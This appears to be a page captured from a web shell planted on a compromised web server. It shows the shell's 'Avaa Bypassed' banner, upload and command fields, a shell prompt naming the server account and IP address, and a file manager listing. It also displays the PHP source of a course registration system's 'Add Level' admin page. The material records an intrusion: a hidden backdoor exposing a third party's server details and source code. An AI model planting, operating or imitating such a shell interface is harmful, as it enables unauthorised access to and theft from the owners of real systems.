[ Avaa Bypassed ]

Upload:

Command:

hmhc3928@18.190.217.197: ~ $ 
<?php
	$page_title = "Add Level | CES Admin";
	include_once($_SERVER['DOCUMENT_ROOT'] . "/php/common_functions.php"); //common functions in the course registartion system
	include_once($_SERVER['DOCUMENT_ROOT'] . "/php/config.php"); //holds global config variables
 	check_if_authenticated('admin');//check if user is logged in
	
if(isset($_POST['submit'])){
	$db = mysqli_connect($mysql_server, $user, $pass, $database);
	if(ctype_digit($_POST['level_id']) && $_POST['level_id'] > 0){ //make sure the level_id is a positive number

		$level_description = htmlentities($_POST['level_description'], ENT_QUOTES);
			$sql = "INSERT INTO ces_levels (level_id, level_description) VALUES (\"$_POST[level_id]\", \"$level_description\")";
		
			if(mysqli_query($db, $sql)){ //if the update is successful show the new entry
				header('location:index.php');
				exit;
			} //end if
		
			else //else the update did not happen so output an error
				$level_error = print_sql_error('Error - level submission failed when doing:', $sql);
		}//if
		else{
			$level_error =  "<div class=error>Error - please enter a positive integer in the Level ID field.</div>";
		}//else
}

	include_once($_SERVER['DOCUMENT_ROOT'] . "/admin/php/top-admin.php"); //get the HTML heading common to all pages in the CES admin module

?>

 <article class="ces-admin">
        <h2>CES Admin - Add Level</h2>


<?php
	include_once($_SERVER['DOCUMENT_ROOT'] . "/admin/php/nav-admin.php");
 	//opens connection to database

	$db = mysqli_connect($mysql_server, $user, $pass, $database);
	if (!isset($_POST['submit'])){ //if form has not been submitted yet
		if(isset($level_error)){
			echo $level_error;
		}
?>
		<form method="post" action="<?php echo $_SERVER['PHP_SELF'] ?>">
			<div class="form-group">
				<label for="level_id">Level ID:</label>
				<input class="form-control" style="width:70px;" type='number' id='level_id' name='level_id' maxlength='2' min='1' max='99' value="4" autofocus required>
			</div>
			<div class="form-group">
				<label for="level_description">Level Description:</label>
				<textarea class="form-control" rows='4' style="height:auto; resize:none;" name='level_description' wrap='soft' required placeholder="Level Description"></textarea>
			</div>
			
			<input type='submit' name='submit' value="Add Level" class="btn btn-lg btn-block ces-green-btn">
			<input type='reset' name='reset' value="Reset Form" class="btn btn-lg btn-block ces-grey-btn">
			<a href="index.php" class="btn btn-lg btn-block ces-orange-btn">Cancel</a>

		</form>


<?php
	} //end if
?>
 
  </article>
    


  </section><!-- #middle-->

</div><!-- #wrapper --> 
 
<?php require_once $_SERVER['DOCUMENT_ROOT'].'/require/footer.php';?>

Filemanager

DIR : / home/ hmhc3928/ public_html_community/ admin/ levels/
Name Type Size Permission Actions
add.php File 2.65 KB 0644
index.php File 4.91 KB 0644